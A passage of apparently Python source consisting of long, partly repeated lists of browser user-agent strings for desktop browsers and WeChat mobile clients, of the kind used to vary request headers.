'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
mozila = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
